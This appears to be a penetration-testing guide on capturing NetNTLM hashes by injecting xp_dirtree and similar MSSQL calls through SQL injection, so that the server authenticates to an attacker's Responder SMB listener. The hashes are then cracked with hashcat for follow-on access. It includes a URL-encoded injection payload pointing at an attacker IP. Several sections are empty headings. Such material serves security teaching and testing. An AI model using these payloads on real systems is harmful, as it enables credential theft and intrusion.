Leaking NetNTLM Hashes
Overview
Database administrators often set up service accounts for MSSQL to access network shares. If SQLi is found, we can capture NetNTLM credentials by coercing the SQL server to authenticate to our SMB share.
Attack Flow
1. Start Responder (SMB listener)
2. Inject xp_dirtree to access our "share"
3. Capture NetNTLM hash
4. Crack hash with hashcatStep 1: Start Responder
Clone Repository
git clone https://github.com/lgandx/Responder
cd ResponderStart Listening
sudo python3 Responder.py -I tun0Verify SMB is ON:
If SMB is OFF, edit
Responder.confand setSMB = On
Step 2: Trigger SMB Authentication
SQL Query
This attempts to list contents of SMB share, requiring authentication.
SQLi Payload
URL Encode
Output: '%3BEXEC%20master..xp_dirtree%20'%5C%5C10.10.15.75%5Cmyshare'%2C%201%2C%201%3B--
Send Request
Step 3: Capture Hash
Responder Output
Captured:
Client IP: 192.168.43.156
Username: SQL01\jason
Hash: NetNTLMv2 hash
Step 4: Crack the Hash
Hashcat Command
Full Example
Output
Alternative SMB Coercion Methods
xp_dirtree
EXEC master..xp_dirtree '\\IP\share', 1, 1;
xp_fileexist
EXEC master..xp_fileexist '\\IP\share\file';
xp_subdirs
EXEC master..xp_subdirs '\\IP\share';
Complete Attack Chain
Hash Format Reference
NetNTLMv2 Format
Hashcat Mode
NetNTLMv1
5500
NetNTLMv2
5600
Troubleshooting
No Hash Captured
Verify Responder SMB is ON
Check firewall allows SMB (port 445)
Verify network connectivity
Try different coercion method
Hash Won't Crack
Try larger wordlist
Add rules:
-r /usr/share/hashcat/rules/best64.ruleMay be strong password (not in wordlist)
Use Cases
After cracking password:
WinRM access (if enabled)
RDP access (if enabled)
SMB access to file shares
Pass-the-hash attacks
Privilege escalation
Quick Reference
Responder
Payload
Crack
Last updated